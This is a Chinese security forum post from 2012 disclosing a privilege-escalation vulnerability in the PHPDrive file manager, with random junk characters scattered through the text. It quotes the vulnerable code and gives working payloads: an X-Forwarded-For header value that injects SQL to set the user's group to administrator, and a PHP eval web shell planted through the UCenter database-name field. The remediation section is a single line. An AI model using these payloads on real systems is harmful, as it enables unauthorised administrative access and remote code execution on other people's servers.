找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2211|回复: 0
打印 上一主题 下一主题

PHPDrive权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:18:34 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
) o# @8 m6 L1 [! u9 G, A
. j- [  P0 a6 L/ ^9 L8 t  iincludes/user.lib.php
5 Y' ^$ H$ o% A3 e6 |' p# g" A行87# q5 ]' J  q& Q  k4 ]4 G
function get_ip() {
, j$ F6 r/ x$ o  b% l5 [! e# j if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
# K* N! d$ o% U7 H" m在用户注册与登录 处module/disk/account.lead.php
- f0 u% W0 X: T& r& \2 c198行 $ i6 N& D4 d! z# i& W* c7 ^
//更新本次登录IP和时间
! W; Q; X" ~7 b/ r, G* ^( F             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
9 p0 p' M, h) g: _. M1 r由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
; l: B  K0 w& ~" C2 S& o实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.# d# F, Q2 o0 {9 F
后台getshell:2 Q& O+ J" B. A
在UCenter设置处,将UC数据库登录名填写为0 j4 o; X- S0 b& d$ S3 f
6 b7 Q) H( `/ A: ?; e
root’);eval($_POST[DisKill]);?>/*
% g, q/ t. t7 L  P可以得到一个shell,位置在 data/uc.data.php
! E. S( S; X0 f* Q9 r
# `" M7 Q8 n: |! _: h. P修复:过滤注入' r0 R/ W0 D7 Q0 D4 S8 d

+ t2 V1 C% f$ C- ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表